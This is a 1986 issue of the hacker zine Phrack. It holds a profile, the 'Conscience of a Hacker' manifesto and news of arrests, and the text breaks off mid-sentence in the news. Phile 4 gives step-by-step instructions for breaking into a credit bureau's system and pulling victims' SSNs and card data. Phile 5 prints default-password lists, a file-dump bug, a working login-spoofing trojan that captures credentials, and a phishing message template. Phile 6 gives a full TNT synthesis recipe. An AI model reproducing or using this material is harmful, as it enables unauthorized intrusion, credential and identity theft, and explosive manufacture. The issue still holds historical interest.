============== Page 1/8 ============== ==Phrack Inc.== Volume One, Issue 7, Phile 1 of 10 September 25, 1986 Welcome to Phrack VII. I'm glad to be back to be able to create something like this. It was rather hard from the hospital. Anyway, I'd like to take you aside and talk to those of you who have various misconceptions about Phrack Inc. First off, Phrack Inc. isn't written by myself, Knight Lightning, or Cheap Shades. We merely collect the philes and distribute them in a group. The articles within are the sheer responsibility of the author. If you do not like the philes, talk to the author, not any of us, unless it says in the phile that we wrote it, please. Phrack World News is merely a sub-article of Phrack Inc. and it is written by Knight Lightning. He is to be addressed for all comments about his ever-controversial PWN, and we'd appreciate it if you'd not condemn the whole publication just for a few articles. Anyone can write for Phrack Inc. now. If you have an article you'd like published or a story for Phrack World News, get in touch with one of us (Knight Lightning, Taran King, and Cheap Shades) and as long as it fits the guidelines, it should make it in. If you have been one of the many ragging on Phrack Inc., please, write a phile and see if you can improve our status with your help. Thanks for your time. Later on. Taran King Sysop of Metal Shop Private Featured in this Phrack Inc.: 1 Intro/Index by Taran King (2175 bytes) 2 Phrack Pro-Phile of Scan Man by Taran King (7133 bytes) 3 Hacker's Manifesto by The Mentor (3561 bytes) 4 Hacking Chilton's Credimatic by Ryche (7758 bytes) 5 Hacking RSTS Part 1 by The Seker (11701 bytes) 6 How to Make TNT by The Radical Rocker (2257 bytes) 7 Trojan Horses in Unix by Shooting Shark (12531 bytes) 8 Phrack World News VI Part 1 by Knight Lightning (15362 bytes) 9 Phrack World News VI Part 2 by Knight Lightning (16622 bytes) 10 Phrack World News VI Part 3 by Knight Lightning (16573 bytes) _______________________________________________________________________________ ============== Page 2/8 ============== ==Phrack Inc.== Volume One, Issue 7, Phile 2 of 10 ==Phrack Pro-Phile IV== Written and Created by Taran King June 28, 1986 Welcome to Phrack Pro-Phile IV. Phrack Pro-Phile is created to bring info to you, the users, about old or highly important/controversial people. This month, I bring to you one of the most influential users of our times and of days of old... Scan Man ~~~~~~~~ Scan Man is the sysop of Pirate 80 (P-80), a telcom enthusiasts' bulletin board in Charleston, West Virginia (304). ------------------------------------------------------------------------------- Personal ~~~~~~~~ Handle: Scan Man Call him: Scan Man Past handles: None Handle origin: Thought it up while writing a scanning program. Date of Birth: 8/30/53 Age at current date: 32 years old Height: 6'1 Weight: About 225 lbs. Eye color: Green Hair Color: Dark Blond to Light Brown Computers: 2 TRS Model I's (one of which the BBS is run on), Tandy Model 1000 (IBM Compatible), a 132 Column Dot Matrix, a 132 Column Daisy Wheel, a Model 100 Portable, a TRS Color Computer, and a backup 80 Column Dot Matrix Printer. Sysop/Co-Sysop of: Pirate 80 (P-80) ------------------------------------------------------------------------------- Scan Man started out in the BBS world about 7 years ago when he first got his modem, a 300 Baud Auto-Answer/Auto-Dial Micro-Connection Modem (made by Micro Peripheral Corp.) with tape input and output. Pirate 80 went up 4 years ago this Halloween, which consisted of a TRS Model 1, 3 40 track, single sided, double density floppies, and a 300 baud modem (which held up until 6 months ago). At the time of arising, the board was put up for interests in phreaking, hacking, as well as pirating. Within the first 6 months to now, Scan Man had gone through 6 BBS programs, and is quite satisfied with the current one. First, he started with a pirated version of TBBS 1.2, then an upgrade to 1.3, pirated again (occurred and at the same time a hard drive was added after a number of disk drive changes and modifications). Scan Man, through his BBS (which was in the first 5 all phreak/hack BBS's to ever go up, and is the oldest phreak board in the country), has met or talked to what he considers "anybody who is anybody". At 11 years old, he found a few old phones, took them apart, and got them working, which was when his interest in telecom arose. He was led into the phreak world when he became aware that he could phreak (articles he read such as blue box articles). At the time, BBS's and personal computers did not exist at this time. The first board he called that involved phreaking was the old Pirate's Harbor. An anonymous message posted there had a few alternate long distance service codes posted. He was very excited that he had stumbled upon this thrill and he spent the first year or so calling around finding exactly what everyone was into and from there forward he started manufacturing various devices with The Researcher. They worked together and learned together. Because so much information posted was inaccurate, they did this to make it accurate and found out what was the real stories. The more memorable phreak boards that he was on included Plovernet, (and all pre-Plovernet), L.O.D., AT&T Phone Center, Pirates of Puget Sound, as well as a few others which he couldn't remember offhand because it was so long ago. Scan Man's works as a computer consultant (systems analyst). He checks security as well as enhancements, improvements, and debugging. He's been doing this for about a year now. Scan Man's hack/phreak interests are unknown to his employers. He has attended various things including sneaking into a seminar on the DMS-250 Digital Switching System, and before that, TelePub'86, and he's sneaked into other various telcom/computer security seminars. He starts one project at a time and does things step by step. He's very concentrated in his projects. Scan Man frowns upon groups and says, "If you're any damn good at all, you're going to get a reputation whether you like it or not." - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Interests: Telecommunications (modeming, phreaking, hacking, satellite scanning), white water rafting, snow skiing, dancing (he used to be a roller skating dance/disco instructor), and boating. Scan Man's Favorite Things -------------------------- Foods: Junk food, or an expensive restaurant once a week or so. Movies: He's a movie buff, and goes regularly, by himself even. Animals: He's an animal lover. Pyrotechnics: They manufacture various fireworks as a hobby. Most Memorable Experiences -------------------------- The Newsweek Incident with Richard Sandza. Last year's New Years' Phreak Party. Some People to Mention ---------------------- The Researcher (for helping him out in starting out with phreak/hacking.) The Coco Wizard (helped a lot with the BBS and the hardware on the computer.) King Blotto, Mr. Gucci, and The Scanner (people he could do without.) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Scan Man dislikes the bickering and fighting between the phone phreaks of modern day because they're just fighting to climb the social ladder. He dislikes the current phone phreaks because they're not in it to learn, and are only in it to gain a big reputation. The old phreaks were those that wanted to be there because they were a student of the network and had a true desire to learn. It's become an ego/power-trip of the modern teenage America. They're only in it to impress other people, and write philes just to get the reputation, rather than to write it for the information in it, and collect them only to say their collection is sizable. He feels that credit cards are voodoo because it seems to be what people and sysops get busted for the most. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in the near future. And now for the regularly taken poll from all interviewees. Of the general population of phreaks you have met, would you consider most phreaks, if any, to be computer geeks? 90% of the phreaks, yes. 10% or less are in it to learn. He respects that small percentage. Thank you for your time, Scan Man. Taran King Sysop of Metal Shop Private _______________________________________________________________________________ ============== Page 3/8 ============== ==Phrack Inc.== Volume One, Issue 7, Phile 3 of 10 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The following was written shortly after my arrest... \/\The Conscience of a Hacker/\/ by +++The Mentor+++ Written on January 8, 1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me... Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will- ing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike. +++The Mentor+++ _______________________________________________________________________________ ============== Page 4/8 ============== ==Phrack Inc.== Volume One, Issue 7, Phile 4 of 10 -=:><:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:><:=- -=:> Hacking The <:=- -=:> Chilton Corporation Credimatic <:=- -=:] By: Ryche [:=- -=:} Written on June 24, 1986 {:=- -=:><:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:><:=- This is the complete version of Hacking Chilton. There is another one that is floating around that's not as complete. If you see it anywhere please ask the sysop to kill it and put this one in its place. The Chilton Corp. is a major credit firm located on Greenville Ave. in Dallas, Texas. This is where a lot of the companies that you apply for credit, check you and your neighbors credit records. Unlike other credit systems such as TRW and CBI, this one contains the records for people with good credit and doesn't wipe out some of the numbers of the cards themselves. All information is complete and includes full numbers as well as the bank that issued it, limit, payments due, payments late, their SSN, current & former address, and also their current and former employer. All you need to know to access this info is the full name, and address of your "victim". Now, how to hack the Chilton. Well, the Chilton system is located in Dallas and the direct dialup (300/1200) is 214-783-6868. Be in half duplex and hit return about 10 times until it starts to echo your returns. There is a command to connect with E-mail that you can put in before echoing return. By echoing the return key your signifying that you want the credit system. I wont go into E-mail since there is nothing of special interest there in the first place. If you are interested in it, try variations of /x** (x=A,B,C,etc.). All input is in upper case mind you. Back to the credit part, once you echo return, you can type: DTS Ctrl-s if you really need to see the date and time or you can simply start hacking. By this, I mean: SIP/4char. Ctrl-s This is the Sign In Password command followed by a 4 character alpha numeric password, all caps as I said before. You can safely attempt this twice without anyone knowing your there. After the third failed attempt the company printer activates itself by printing "Login Attempt Failed". This is not a wise thing to have printed out while your trying to hack into it since there is always someone there. If you try twice and fail, hit Ctrl-d, call back, echo, and try again. You can keep doing this as long as you wish since there is no other monitoring device than that printer I mentioned before. Since this only activates when you fail to login correct you can safely say there is little if no danger of your discovery. I would suggest going through an extender though since Chilton does have access to tracing equipment. About the passwords, as far as I know, there are 3 different classes of them with varying privileges, these are: 1-User/Employee 2-Permanent/Secretary 3-Input Output The first one is just to look and pull credit reports. These passwords go dead every Sunday night at 11:00pm or so. The new ones are good from Monday to Sunday night. Even though your pass is good for one week, there are limited times you can use this. The credit system is only accessible at these times: Mon-Fri: 8:00am to 11:00pm, Sat: 8:00am to 9:00pm, and Sun: 8:00am to 6:00pm The second class is the same as the first except that these only change whenever someone leaves the company. These were originally supposed to be set up for the secretaries so that if they ever need quick access they could w/o having to go down to the Credit Dept. every week for a new password. The third is one I have never gotten..yet. It has the ability to alter a persons credit reports for one month. At the first of the month the system updates all reports and changes your alterations to the credit reports. Doing this though would warrant going through a diverter since your fucking with someone's life now. Once you have hacked a pass and it accepts the entry it will display the warning: ****WARNING! UNAUTHORIZED ACCESS OF THIS SYSTEM IS A FEDERAL CRIME!**** Or something along the same lines. After this you should be left to input something. This is where you enter either In House Mode, System Mode, or Reporting Mode. In House Mode will give you the reports for the people living in Dallas/Fort Worth and surrounding counties. System Mode is good for surrounding states that include: Massachusets, Illinois, Louisiana, Missouri, Arkansas, New Mexico, Colorado, Arizona, some of New Jersey, and a few others I cant remember. There are 11 states it covers. Reporting is a mode used for getting transcripts of a persons reports and would require you to input a companies authorization number. So for this file lets stick to In House and System. Get your victims stats ready and enter a mode: In House: I/NH Ctrl-s (Dallas/Ft. Worth 214) System: I/S Ctrl-s (All other NPA's) After that its time to pull records. Type in: I/N-Last Name/F-First Name/L-Street Name/Z-Zip Code/** Ctrl-s If you don't know his street name, use 'A' and it will go into a global search routine until it finds name that match or are at least 80% similar to the one you used. Although the Zip Code is not needed and can be left out, it does narrow the search field down considerably. Once it finds the name, it will show you his Name, SSN, Current Address, Employer, and former ones if there are any. Right after his name you will see a ID number. Sorta like: 100-xxxxx Write this down as it is your key to getting his reports. After it finishes listing what it has on him its time to see the full story. Type: N/100-xxxxx/M/D Ctrl-s What it will display now is his whole credit history. When you first pulled his ID number you might have seen he had two names but with a variance like middle name or a misspelled address. Pull both of them as they are just an error in whoever put the reports in. I would suggest capturing this so that you can refer back to it w/o having to access the system every time. There is another way to get into Chilton through Tymnet but I have no idea of the address for this and its a waste of time. If you happen to get the name and address of an employee of the company forget the idea of pulling his stats, Chilton doesnt allow employee records to be in there. One very good point made not too long ago is the prospect of going through the phone book and picking names at random. Although Credit Card numbers are displayed credit card fraud is thwarted by the small fact that it does not show expiration dates. No company making an actual inquisition on a person would need that information and to prevent the fraudulent or misuse of the information they were left out. There is an interesting note that at one time in the companies history they did have a small that signified a drug record. This was taken out as it wasn't pertinent to the computers purpose and was only there because Borg Warner, the company that owns Chilton wanted to pry into peoples lives. The computer has a 10 line rotary, so unless there are 11 people using it at the same time your chances of getting a busy signal are almost if not next to nil. Disclaimer: The information provided in this file is a tutorial and is provided for the purpose of teaching others about this system and how it operates. It is not provided to promote the fraudulent use of credit cards or any other such action(s) that could be considered illegal or immoral. Myself, and the editors/publishers/distributors of this newsletter are in no way responsible for the actions or intentions of the reader(s) of this file. <>>>> Ryche <<<<> _______________________________________________________________________________ ============== Page 5/8 ============== ==Phrack Inc.== Volume One, Issue 7, Phile 5 of 10 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ PROGRAMMING RSTS/E $ $ File1: Passwords $ $ $ $ by: The Seker $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ Written (c) May 22, 1986 $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ PREFACE: -------- This document is first in a series of ongoing files about using the RSTS/E operating system. All the files are based on version 8.0 as it is almost fully compatible with the previous releases. If the need arises I have made sure to note differences between V8.x and V9.x. Credit goes to High Evolutionary for urging me to write these files; to Night Stalker for sharing info; and to all other RSTS hackers that have contributed in some way or another. HISTORY: -------- The RSTS/E (Resource System Time Sharing /Environment) operating system was developed for the PDP/11 series of minicomputers created by DEC. (Digital Equipment Corporation) It was developed with ease of use for the user (and hacker) in mind. Because of this, there have been a lot of overlooked errors leaving the system with quite weak security. In later versions, especially the 9.x series password security has been greatly improved and is more secure, but still has plenty of bugs for us to breach. LOGGING ON: ----------- Briefly.. locate a valid number and connect. Hit c/r (carriage return) a few times or type: HELLO The system should identify itself displaying to you who owns it, what version they're running under, the date, and the time. Then it will prompt for an account number and a password. Accounts are in a PPN (Project Program Number) format. This is actually two numbers each between 0 and 254 separated by a comma or a slash. (eg. 3,45 or 27/248) Privileged accounts which you should hopefully be striving for all start with a 1. So start hacking 1,x accounts. Passwords are 1-6 characters long. They are only alphanumeric so you don't have to worry about all that other shit being included. On V9.x systems passwords may be up to 8 characters if the operator has changed the default length. But this rarely ever happens as most ops are too lazy. Common passwords are: SYSLIB SYSGEN SYSCON SYSMGR SYSOPR SYSTEM OPRATR RSTS DECNET GAMES YYYYYY XXXXXX XYXYXY DATA RICH XXX AAA Many of those have been rumored to be defaults. But actually I think the true default (if there is one!) password is: RSTSE Also, accounts that have a password of: ?????? are only accessible by operators. Remember to try names, cars, objects, the name of the company (in different variations), etc. Cause most people generally pick passwords that have some relation to their private life.. Take a little time and guess... YOUR IN! -------- Once you have succeeded in hacking out a valid password, whether it be privileged or not, I suggest you find out who is logged onto the system. You can do this simply by typing: SY This will tell you everyone logged on, what they are doing at the moment, their job number, whether they are attached or detached, and a hell of a lot of other crap. What you are looking for is someone else logged in under the same account you are. If you find another user in the same account you hacked, log off and call back later. This will prolong the life of your account and prevent a rise in suspicion by the sysops. Remember, every system keeps a log of what you do, and if two people are logged in under the same account many times the sysops will delete or change the password to that account. If everything checks out okay, you're free to do as you please. To list the files in your allotted space type: DIR or to see all the files on the system type: DIR (*,*) NOTE: [ ] may be used in place of ( ) when dealing with files. * acts as a wildcard on the RSTS system and can be used in place of account numbers when searching for specific files. Speaking of searching for files; to run a file type: RUN filename.filetype where filename = the file you wish to run, and filetype = the extension. Experiment! Try what you will. If you ever need help just type: HELP Read the files contained within help. They are very detailed and I guarantee can help you with what ever it is you need done. One other thing, a few useful control characters are: ^C Breaks out of whatever your doing ^R Repeats last line typed ^X If ^C doesn't work, this may ^O Use to stop the flow of text without aborting the function in process ^T Tells status and runtime of terminal ^U Deletes line presently being typed in ^H Deletes characters ^S Transmission off ^Q Transmission on GAINING PRIVILEGES: ------------------- If you weren't able to hack out a privileged account don't panic. There are still a few other ways for you to attain sysop status. These methods may not always work, but they are worth a try. ]SYSTEM LOG[ On many RSTS/E systems before V9.0 there is one account dedicated to keeping the system log; everything you and everyone else does. I have found this account many times to be 1,101, 1,2, or 0,1 but you may want to do a directory find to make sure. Type: DIR (*,*)OPSER.LOG or if nothing appears from that type: DIR (*,*)SYSLOG.* or DIR (*,*) Look for a file similar in name to that and mark down the account it appears in. Now that you know which account the system log resides in logoff. BYE Then sign back on using the account in which the file was in. For password try one of the following: OPSER OPSLOG LOG OPS OOPS OPRATR SYSLOG SYSTEM These are common passwords to that account. If none of these work your out of luck unless you can think of some other password that may be valid. ]SYSTEM BUGS[ When operating systems as complex as RSTS/E are created there will undoubtedly be a few bugs in the operation or security. (Sometimes I am not sure if these are intentional or not.) These can often be taken advantage of. One that I know of is RPGDMP.TSK. To use this type: RUN (1,2)RPGDMP It will ask for a filename, and an output device. Give it any filename on the system (I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dumped to the specified device. (db1:, screen, etc). Credit for this goes to The Marauder of LOD for finding, exposing and sharing this bug with all. If you find any other bugs similar to this, I would appreciate your getting in touch with and letting me know. GETTING PASSWORDS: ------------------ Now that you've hopefully gotten yourself priv's we can get on with these files. Getting many passwords is a safety procedure, kind of like making a backup copy of a program. There are a number of ways to get yourself passwords, the easiest is by using privileges, but we will discuss that in a later file. The methods I am going to explain are the decoy and a trick I like to use, which I call the mail method. ]DECOY[ The decoy, commonly called a Trojan Horse, (which is something completely different) is a program which emulates login.bac. When the unsuspecting user enters his account and password you have your program store it into a file that you can retrieve later. Here is a short program I've written that will preform this task: type NEW and it will prompt for a filename. Enter something not to obvious. 1 ! RSTSE Decoy 2 ! Written by The Seker (c) 1986 TOK! 5 extend 10 print:print 20 &"RSTS V8.0-07 TOK Communications Ltd. Job 7 KB41 ";date$(0);" ";time$(0) 30 print 40 &"User: "; 50 open "KB:" for input as file 1 60 on error goto 300 70 input 1,proj%,prog% 80 z$=sys(chr$(3%)) 90 &"Password: "; 100 on error goto 300 110 input 1,pass$ 120 print:z$=sys(chr$(2%)) 130 close 1 140 open "SYSLIB.BAC" for output as file 2 150 print 2,proj% 160 print 2,prog% 170 print 2,pass$ 180 close 2 200 print:print 210 off$=sys(chr$(14%)+"bye/f"+chr$(13)) 300 if erl=70 then goto 350 310 if erl=110 then goto 360 350 &"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 then goto 200 else resume 30 360 &"Invalid entry - try again":try=try+1:if try=5 then goto 200 else resume 90 999 end The program as I said emulates login.bac, then logs the person off after a few tries. Save this program. Then run it. When it starts, just drop the carrier. The next person to call within 15 minutes will get your imitation login. If you are working on an older system like V7.0 change line 40 to read: 40 &" "; NOTE: This will not work without modifications on releases after V8.7. An improved and updated version of this program will be released as a small file at a later date. Next time you login and you want to recover the file type: TYPE SYSLIB.BAC It should print out the account and password. If you set this running each time you plan on hanging up within a few days you'll have yourself a handful of valid accounts. ]MAIL[ To run mail type: RUN $MAIL The mail method is probably used by many hackers and since I like to use it, I thought I'd tell you what it was. When you run the program the utility will tell you exactly how to use itself. Assuming you know a little about it anyway we will get on with the file. The object is to send mail to another user and try and convince him/her you are the sysop and are writing him/her to validate their password. Don't try this with a priv'd user! It would result in instant deletion. Here's basically what you'd type: Hello. We are contacting each of the users and validating their records to keep our files up to date. If you would cooperate and leave me a response which includes your full name, account number, and password we would appreciate your help. John Doe System's Operator 4,11 As you can see the idea is to con a user into believing you are one of the system ops. I would say this method works approximately 70% of the time on most systems since users often times don't associate with sysops. Use a different name if you try this though, as John Doe wouldn't fool anyone. (Be creative) Also the 4,11 is the account you'd like them to leave the response too. You can try a few variations of this if you like. For example, if the system you're hacking has a chat program: RUN $TALK You can just talk live time to them. Or if you somehow (like trashing) manage to get a list of all the users and their phone numbers, you can call them up and bullshit them. NOTE: This document is intended for informational purposes only. The author is in no way responsible for how it is used. Sysops are free to display this at their will as long as no information within is altered and all acknowledgements go to The Seker. ============== Page 6/8 ============== ==Phrack Inc.== Volume One, Issue 7, Phile 6 of 10 XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX Xx xX Xx American Dynamite xX Xx xX Xx By The Rocker xX Xx of xX Xx Metallibashers Inc. xX Xx xX Xx for: ==Phrack Inc.== xX Xx xX XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX Recipe: Mix 170 parts tolulene with 100 parts acid. The acid made of 2 parts of 70% nitric and 3 parts of 100% sulfuric. Mix below 30 degrees. Set this down for 30 min. and let it separate. Take the mononitrotolulene and mix 100 part of it with 215 parts of acid. This acid is 1 part pure nitric and 2 parts pure sulfuric. Keep the temperature at 60- 70 degrees while they are slowly mixed. Raise temp to 90-100 and stir for 30 min. The dinitrotoluene is separated and mix 100 parts of this stuff with 225 parts of 20% oleum which is 100% sulfuric with 20% extra dissolved sulfur trioxide, and 65 parts nitric acid. Heat at 95 degrees for 60 min. Then at 120 degrees for 90 min. Separate the trinitrotoluene and slosh it around in hot water. Purify the powder by soaking it in benzyne. Presto! American Dynamite! Thanx to S.A. for the idea! Thanx to Phrack Inc. for just being a sponsor! Don't forget to call these systems after you obliterate someone's house with that T.N.T... ======================================= Speed Demon Elite..........415/522-3074 High Times.................307-362-1736 Metalland South............404-576-5166 Brainstorm Elite...........612-345-2815 Atlantis...................215-844-8836 ======================================= Metallizing, The Rocker/MBI ========================================================================= ============== Page 7/8 ============== ==Phrack Inc.== Volume One, Issue 7, Phile 8 of 10 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN *^=-> Phrack World News <-=^* PWN PWN PWN PWN Issue VI/Part 1 PWN PWN PWN PWN Compiled and Written by PWN PWN PWN PWN Knight Lightning PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Oryan QUEST Vs. Dan Pasquale June 21, 1986 ---------------------------- Yes, our buddy from the west coast is back in action, this time against Oryan QUEST. Oryan QUEST was busted on April 6, 1986 (See PWN Issue IV Part 2), for hacking AT&T Mail, by the San Mateo Police Department and the FBI. Because of legal technicalities, the charges were dropped but, Oryan's computer was confiscated and never returned. He has since bought a new computer (IBM AT) and is now back among us. It is believed that someone (Dan Pasquale?) must have found Oryan's notebook which contained his passwords on to bulletin boards around the country. One example of this is "The Radio Station Incident" (See PWN Issue IV Part 3) where a fake Oryan QUEST wandered the BBS and when questioned as to his legitimacy quickly dropped carrier. Most recently Oryan QUEST has been getting job offers in computer security. He hasn't accepted any at this time. Also he has been getting several calls from Dan Pasquale. Dan wants Oryan's help to bust any and all hackers/phreaks. Dan is very pissed these days because someone charged $1100.00 worth of Alliance Teleconferences to his phone bill and now he wants revenge. He has stated that one of his main projects is to bust P-80, sysoped by Scan Man. Dan Pasquale says that Scan Man works for a long distance communications carrier. I personally think he has as much of a chance of busting P-80 Systems as a snowball staying frozen in a microwave. Lets face it, if John Maxfield and the other investigators haven't busted P-80 yet, they never will...let alone some little police sergeant in California. Dan also added that he is going to "hose" Speed Demon Elite. He claims that he is already a member of SDE and that its only a matter of time before he takes it down forever. He also mentioned that he has placed a Dialed Number Recorder (DNR) on Radical Rocker's phone lines. Furthermore, it was learned that Dan Pasquale managed to get an account on to The Underground, sysoped by Night Stalker. It is unknown as to if Dan has anything to do with Night Stalker's bust. Dan Pasquale also said, "I will bust these hackers any way I can!" To really understand what that statement means you would probably have to live in California. What Pasquale was referring to was moving violations. If you (a driver under 21) receive any type of moving violation, both your insurance company and your parents are notified. This raises your insurance rates and gets you into trouble. If you get two moving violations, kiss your license goodbye for at least 2 years. Radical Rocker having heard about Dan Pasquale's plans to destroy Speed Demon Elite, went on a user purge and has destroyed any and all accounts that were held by those that he did not know personally. Speed Demon Elite is now a private BBS and supposedly Radical Rocker has now cleared things up with Dan Pasquale. Information provided by Oryan QUEST and Radical Rocker _______________________________________________________________________________ Marx and Tabas: The Full Story July 1,1986 ------------------------------ It all started with Cory Andrew Lindsly aka Mark Tabas, age 19. He worked for the Colorado Plastic Card Company and had access to the plastic cards that credit cards were made with. He had taken 1350 and stashed them away for later usage. His plan would have went perfectly if not for Steve Dahl. He was busted in Miami by the US Secret Service for whatever reasons. They gave him a chance to play ball. Dahl had heard about Mark Tabas and Karl Marx's scheme and after informing the Secret Service about this he was given an embossing machine. Steve Dahl then flew to Denver and set up the meeting. Mark Tabas lived in Denver and wanted his friend James Price Salsman aka Karl Marx, age 18, to join in on the fun. So Marx flew down on a carded plane ticket that Tabas had signed for. The meeting took place in a room at the Denver Inn. The room was bugged and 19 cards (Visa, MasterCard, and some blanks) were made from a possible 140 that they had brought. They decided to celebrate by ordering champagne on the card of Cecil R. Downing. A member of the Secret Service actually delivered the champagne to the room disguised as a waiter. Tabas signed for the drinks and the twosome were nailed. To make matters worse the SS also matched Tabas's signature with the signature used to buy the carded plane ticket. ------------------------------------------------------------------------------- The sentencing goes like this: Maximum: 10,000 dollars (Local Law) Maximum: 250,000 (Federal Law) Maximum: 10 years in jail (both) Or any combination of the three. Both Tabas and Marx were let out on bail of five thousand dollars each. The actually charge is: The manufacturing and possession of unauthorized access devices. The U.S. Magistrate Hilbert Schauer will be overhearing the case. There is a rumor that charges on Salsman were dropped and that he is in no trouble at all since he didn't actually buy the plane ticket, he was given it, he didn't steal the cards, and he didn't emboss them. So supposedly the Secret Service let Marx go because he didn't know about the cards, he was just there at the wrong time. Information Provided By The Denver Post and Sally Ride:::Space Cadet _______________________________________________________________________________ The Saga Of Mad Hacker July 15, 1986 ---------------------- Mad Hacker of 616 NPA 616 wrote a random Compuserve hacker because he was bored and wanted something to do. It ran constantly for about a week and was he surprised when it came up with an account. However he made the mistake of not checking to see whose account it was, he used the SIG's (Special Interest Group's) and ran up a bill slightly under $300. About a month later he was living over at a friend's house and the owner of the account showed up, who just happened to be a family friend of the people that MH was staying with. He asked both of them (the teenagers that is) if they were using his account (they all had Compuserve accounts and the family knew they were computer buddies). Mad Hacker said no and truthfully meant it. Now around July 1, 1986 the account owner turned the matter over to the Kalamazoo Police Department since CIS (Compuserve) could not find anything out beyond the dialup used to access the account. The police called around to everyone in the area ("everyone" meaning all the "real" hacks and phreaks, not rodents who think they're bad because they use handles) including Thomas Covenant and Double Helix. Most of everyone instantly forgot that Mad Hacker ever existed, but somehow they got a hold of the phone number where he was staying (at the time he was staying at his girlfriend's house, he was not living there before) and contacted the owner of the account and put out a warrant for Mad Hacker's arrest. As of now, Mad Hacker faces *FELONY* charges because of the large amount of the bill. The warrant for his arrest has been suspended, letting the account owner to handle things in his own way. The owner has confiscated all of Mad Hacker's computer equipment (3 computers and hardware etc.) until the bill is completely paid back. Mad Hacker has progressed from merely delivering clever obscenities over the fone to his adversary to actual vengeance. One example in the planning stages will be in the form of camping out in said account owner backyard (in a rural area), hooking up to a junction box, and running the account owner's Long Distance phone bill out of sight. Mad Hacker is supposed to have a file on Junction Box Modeming coming soon, he is currently borrowing a computer from a friend. Information Provided by Thomas Covenant _______________________________________________________________________________ Lock Lifter *Busted* July 2, 1986 -------------------- Lock Lifter was busted for hacking an MCI Vax. he had downloaded a list of MCI Calling Cards that he later abused and in return he received a *free* DNR on his line for about 3 months. He was also given a scare from MCI Investigations (for unknown reasons) previous to his visit from law enforcement officers and as such his BBS, The Black Chamber, was deleted and the userfiles were destroyed, so there really isn't much to worry about from the user's standpoint. Lock Lifter had been making plans to take his board down anyway, so being without The Black Chamber is just an adjustment we would have had to make eventually regardless of Lock Lifters bust. Information Provided By Arthur Dent/Cyclone II/Kerrang Khan/The Seker - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Some notes from Cheap Shades: "I was told by Arthur Dent that Lock Lifter did not have his computer anymore, but someone using LL's password called my AE, Metal Shop AE (for which he had lost his AE access but could still log on), and left me feedback in all caps (not like LL would do) that said something like PLEASE GIVE ME ACCESS TO THE GO AE FUNCTION." Arthur Dent has now confirmed that Lock Lifter did not make the call in question and that there is definitely a fed or someone with Lock Lifter's BBS passwords. Sysops be warned. _______________________________________________________________________________ Daniel Zigmond: The Plot Thickens July 13, 1986 ---------------------------------- Daniel Zigmond appeared, for a short time, on Pirate-80. Scan Man let him on to make a statement and then shut him off the board. It is now left to the users to decide whether or not he should be allowed back on. Information by Sally Ride:::Space Cadet Some sources say that we are seeing "Whacko Cracko" syndrome, where the story gets more and more bizarre as versions get modified. Like TWCB, Zigmond supposedly says one thing to one person and something different to the next, depending on what he thinks they may want to hear. The following information was found under in an anonymous post on an unspecific bulletin board. It would appear that someone performed a credit check on Daniel Zigmond (with TRW) and came up with some very interesting results. As many of you should know, TRW keeps records of all major transactions you make, credit cards you have, house or car payments, bank accounts you own, your job, and many other things. Daniel Zigmond's TRW account is a little different, it has been flagged and the information is not there. What it does show is that Daniel Zigmond holds the position of 